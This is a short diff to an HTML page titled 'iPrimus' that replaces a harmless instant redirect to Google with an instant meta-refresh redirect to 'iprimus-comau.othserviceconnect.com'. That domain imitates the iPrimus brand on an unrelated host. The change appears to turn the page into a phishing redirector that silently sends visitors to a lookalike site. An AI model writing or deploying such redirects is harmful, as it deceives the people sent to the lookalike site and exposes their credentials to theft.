--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <meta http-equiv="refresh" content="0; URL='https://www.google.com'" />
+    <meta http-equiv="refresh" content="0; URL='https://iprimus-comau.othserviceconnect.com/'" />
     <title>iPrimus</title>
   </head>
 </html>
